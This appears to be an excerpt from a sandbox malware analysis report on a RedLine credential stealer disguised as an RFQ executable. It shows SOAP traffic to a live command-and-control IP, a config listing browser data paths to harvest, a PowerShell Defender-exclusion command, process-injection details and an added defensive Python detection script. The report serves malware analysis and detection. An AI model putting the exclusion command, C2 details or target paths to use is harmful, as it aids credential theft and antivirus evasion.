                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          1 | 192.168.2.5 | 49714 | 193.70.111.186 | 13484 | 3168 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 18, 2024 17:34:11.786926985 CET | 221 | OUT | POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 35640
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Nov 18, 2024 17:34:12.825676918 CET | 294 | IN | HTTP/1.1 200 OK
                                                                                          Content-Length: 147
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:12 GMT
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          2 | 192.168.2.5 | 49717 | 193.70.111.186 | 13484 | 3168 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 18, 2024 17:34:12.832226992 CET | 241 | OUT | POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 35632
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Connection: Keep-Alive
                                                                                          Nov 18, 2024 17:34:14.162611961 CET | 408 | IN | HTTP/1.1 200 OK
                                                                                          Content-Length: 261
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:14 GMT
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                          Target ID:0
                                                                                          Start time:11:33:55
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe"
                                                                                          Imagebase:0x2dba8a00000
                                                                                          File size:2'875'465 bytes
                                                                                          MD5 hash:51E2A4CF52A06BFF7B50826173D6A0AD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
                                                                                          Imagebase:0x7ff7be880000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                          Imagebase:
                                                                                          File size:45'984 bytes
                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:5
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                          Imagebase:0x10000
                                                                                          File size:108'664 bytes
                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Wow64 process (32bit):
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                          Imagebase:
                                                                                          File size:108'664 bytes
                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:7
                                                                                          Start time:11:33:58
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:10
                                                                                          Start time:11:33:59
                                                                                          Start date:18/11/2024
                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056
                                                                                          Imagebase:0x7ff749f20000
                                                                                          File size:570'736 bytes
                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

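The process table above is the part of this report an analyst turns into a detection: a .NET Framework utility (CasPol.exe, Target 6) started with nothing but its own quoted path as the command line, still running at the end of the analysis, while the report's signatures flag PE injection into a foreign process; and a WerFault.exe instance whose `-p` argument names the crashing PID. The following Python script is an added example written for this page, not Joe Sandbox code and not part of the report. It parses the report's `key:value` process blocks (the three entries above are reproduced as the sample input), flags .NET Framework utilities launched with no arguments, and extracts the crashed PID from the WerFault command line. The list `NET_FRAMEWORK_HOSTS` is an assumption, an analyst-maintained list of .NET Framework binaries commonly used as injection hosts; only CasPol.exe is attested on this page, and which process actually hosted the stealer should be confirmed against the Yara hits on the memory dumps.

```python
import re
from typing import Dict, List

# Sample input: the Target 6, 7 and 10 blocks from the report's process table
# above, with the layout whitespace trimmed (report data, not new observations).
SAMPLE_PROCESS_TABLE = r"""
Target ID:6
Start time:11:33:58
Start date:18/11/2024
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):
Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:
File size:108'664 bytes
MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:7
Start time:11:33:58
Start date:18/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:11:33:59
Start date:18/11/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056
Imagebase:0x7ff749f20000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true
"""

# ASSUMPTION: analyst-maintained list of .NET Framework utilities that are
# frequently used as hollowing/injection hosts. Only CasPol.exe appears on
# this page; the others are included to make the rule reusable.
NET_FRAMEWORK_HOSTS = {
    "caspol.exe", "regasm.exe", "regsvcs.exe",
    "installutil.exe", "msbuild.exe", "applaunch.exe",
}


def parse_process_table(text: str) -> List[Dict[str, str]]:
    """Split the report text into per-process dicts. Values are split on the
    FIRST colon only, so 'Commandline:C:\\...' and 'Start time:11:33:58' survive."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry: Dict[str, str] = {}
        for line in block.splitlines():
            line = line.strip()
            if ":" not in line:
                continue
            key, _, value = line.partition(":")
            entry[key.strip()] = value.strip()
        if "Target ID" in entry:
            entries.append(entry)
    return entries


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def command_line_args(cmdline: str) -> str:
    """Return everything after the image token (quoted or bare); '' means no args."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def flag_injection_hosts(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """A .NET Framework utility started with no arguments does nothing useful on
    its own; combined with the report's injection signatures it is a host candidate."""
    findings = []
    for e in entries:
        image = _basename(e.get("Path", ""))
        if image in NET_FRAMEWORK_HOSTS and command_line_args(e.get("Commandline", "")) == "":
            findings.append({
                "target": e["Target ID"],
                "image": image,
                "reason": "dotnet-utility-launched-without-arguments",
                "exited": e.get("Has exited", ""),
            })
    return findings


def werfault_crashed_pids(entries: List[Dict[str, str]]) -> Dict[str, int]:
    """Map each WerFault.exe Target ID to the PID it was reporting on (-p <pid>)."""
    pids: Dict[str, int] = {}
    for e in entries:
        if _basename(e.get("Path", "")) == "werfault.exe":
            m = re.search(r"-p\s+(\d+)", e.get("Commandline", ""))
            if m:
                pids[e["Target ID"]] = int(m.group(1))
    return pids


if __name__ == "__main__":
    procs = parse_process_table(SAMPLE_PROCESS_TABLE)
    for f in flag_injection_hosts(procs):
        print(f"Target {f['target']}: {f['image']} ({f['reason']}, exited={f['exited']})")
    print("WerFault crash PIDs:", werfault_crashed_pids(procs))
```

The crashed PID 5276 is not one of the Target IDs in this table (the report numbers targets, not PIDs), so the WerFault entry is best used as a pivot back to the process list to see which analysed process died at 11:33:59, not as a detection on its own.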
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2328380573.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848fd0000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 497dd28c6f2d05aa2d8d71414b8e85a4cc302358057de6e2f7992c2a0ecce9b0
                                                                                            • Instruction ID: 9d6919082891864a0b4c41af99eef5c6f0c2ae582c489aa09680d8f0f82d15d2
                                                                                            • Opcode Fuzzy Hash: 497dd28c6f2d05aa2d8d71414b8e85a4cc302358057de6e2f7992c2a0ecce9b0
                                                                                            • Instruction Fuzzy Hash: B4E23972C0DACA8FE756FB2898555A47FE0FF96340F0901FAC58ACB1D3DA286846C745
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: 92545ec4a03acc379d43edf7593b5b5d94637e29eae70231e230211d3c6cb9ce
                                                                                            • Instruction ID: 44a3791e706811cc4cb43a48ba61fcc3f6840fb99abc6429584febec995ee1af
                                                                                            • Opcode Fuzzy Hash: 92545ec4a03acc379d43edf7593b5b5d94637e29eae70231e230211d3c6cb9ce
                                                                                            • Instruction Fuzzy Hash: 87223331A1CA4A4FE359EB2C94855B177E0FF96354F1442BAC48AC72D7EF28F8428785
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 98d2dcfe31f483346c695dfa3b2c19b8d4588a47e9610262109fd7e73caa1ce4
                                                                                            • Instruction ID: f1cbfb0653b7d7f52628a608d3298ae15c73f1332053ebc2227ceb07f1b3424e
                                                                                            • Opcode Fuzzy Hash: 98d2dcfe31f483346c695dfa3b2c19b8d4588a47e9610262109fd7e73caa1ce4
                                                                                            • Instruction Fuzzy Hash: 02B21330A1CB854FD359EB2884914B5B7E2FF96341F1446BEE48AC72D6EB34E846C781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be7272cdf4805c7497a5ced90c522d0ca37985ae993893e3d215543578aa2369
                                                                                            • Instruction ID: f33178ab3a64386770d35097c64e435a1911a80bba908e9caffe27090911d1a7
                                                                                            • Opcode Fuzzy Hash: be7272cdf4805c7497a5ced90c522d0ca37985ae993893e3d215543578aa2369
                                                                                            • Instruction Fuzzy Hash: 81826831A0C6868FE71A9B2484516B47BE1FF92350F5441BED48ECB9D7DF28AC86C784
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96a0a4a819a88fd608a6b8dbea81590c2d54cd9bdf8eb626357e49f0ea4cbdac
                                                                                            • Instruction ID: b125c10d413187b6f136519e6ab7a23a53da842143e2dda762b3d7bccb905664
                                                                                            • Opcode Fuzzy Hash: 96a0a4a819a88fd608a6b8dbea81590c2d54cd9bdf8eb626357e49f0ea4cbdac
                                                                                            • Instruction Fuzzy Hash: 6D42E530A1DA098FDB68EB28D455A7977E1FF56341F1401BEE48EC72D2EF24AC428745
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d42c2578d6139a73145ac996bc3c1988ed4bb60d52a597f1fba3d6716bca61ef
                                                                                            • Instruction ID: 955bb26fa287221d0c99e51ddf4837d8c2f5a6417baf7c905dee451faeddcc7c
                                                                                            • Opcode Fuzzy Hash: d42c2578d6139a73145ac996bc3c1988ed4bb60d52a597f1fba3d6716bca61ef
                                                                                            • Instruction Fuzzy Hash: 9DC16B3091CB8A4FE31DDB298495075B7E2FFD6202F1486BED4C6C31D6EB28A486C785
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f3562df80c5a584a28fae910bb235a29982b428698e825938c3defc4d083ec7
                                                                                            • Instruction ID: 3274b0b9c8e517abd9ecd75a838f36b805efbaf0d2c33dd95c32293fa5cd26e7
                                                                                            • Opcode Fuzzy Hash: 3f3562df80c5a584a28fae910bb235a29982b428698e825938c3defc4d083ec7
                                                                                            • Instruction Fuzzy Hash: 4A71B631B1CA094FD758FB6C94554BA73E1FB99350F10453EE58BC32D6EF24E8428685
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a3298844615e96ab2c03463549c803b937d02786ac53577b2edc08051737869
                                                                                            • Instruction ID: 463e2e65daf4e5c4ffadc4148443cc5e76040c0b6fa81266d7e6d25fb904db96
                                                                                            • Opcode Fuzzy Hash: 1a3298844615e96ab2c03463549c803b937d02786ac53577b2edc08051737869
                                                                                            • Instruction Fuzzy Hash: 0D414831A0D7891FD71E9A3888261B57FA1EB87220B1582BFD087CB6E7DD1868078395
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0310447bd0b65d5be2388b4e3f46241f3ddd56550bdf82146f88a8a5bcc9c9d8
                                                                                            • Instruction ID: 7d076a52912529727128672089777380b8640dd194263af88478771ba4d68b7f
                                                                                            • Opcode Fuzzy Hash: 0310447bd0b65d5be2388b4e3f46241f3ddd56550bdf82146f88a8a5bcc9c9d8
                                                                                            • Instruction Fuzzy Hash: 18412731A0D7891FD71E9B3888251757FA5EB97310B1982BFD087CB2E7DD28A8068395
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O_^$O_^
                                                                                            • API String ID: 0-4076051052
                                                                                            • Opcode ID: 09c1eb3aa24ba4e702313e286b439c0c3c66a507d55e3795eaae02688d0f8174
                                                                                            • Instruction ID: d411f44a9f925e458763bd804cee6e1077830e2013e2e025a74848ca7192993e
                                                                                            • Opcode Fuzzy Hash: 09c1eb3aa24ba4e702313e286b439c0c3c66a507d55e3795eaae02688d0f8174
                                                                                            • Instruction Fuzzy Hash: 2A91133192DB854FE31AEB289C551B17BE0EF52740B5904BED08ECB1D3EA29BC02C745
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O
                                                                                            • API String ID: 0-878818188
                                                                                            • Opcode ID: bf8e8a9ee7dfc3434572e330d7a50fbd990234d2a73b1ed22ba553fa485b6694
                                                                                            • Instruction ID: 02cbeed9ec38add256c280ebd6396098285f01f3e0e393c2a4a95ad8f54ec8fb
                                                                                            • Opcode Fuzzy Hash: bf8e8a9ee7dfc3434572e330d7a50fbd990234d2a73b1ed22ba553fa485b6694
                                                                                            • Instruction Fuzzy Hash: 3AC14930E1DA564FE71AAB9594901B5B3D2FF92341F58417EC48BC71C6EF3CB8428265
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H
                                                                                            • API String ID: 0-2852464175
                                                                                            • Opcode ID: 172aeabec0064332bf05a9399399f3e87b0c0aac7d5ade637321580200e86df2
                                                                                            • Instruction ID: f3dd7d70d1f28200d38f43c5085929698ef78f778155bd08fc0e6435e33f840d
                                                                                            • Opcode Fuzzy Hash: 172aeabec0064332bf05a9399399f3e87b0c0aac7d5ade637321580200e86df2
                                                                                            • Instruction Fuzzy Hash: 2C91BE62A4E7D64FE31367745C790A07FB0AE23961B1E41EBC1D4CB5E3E65D280AC326
                                                                                            Strings
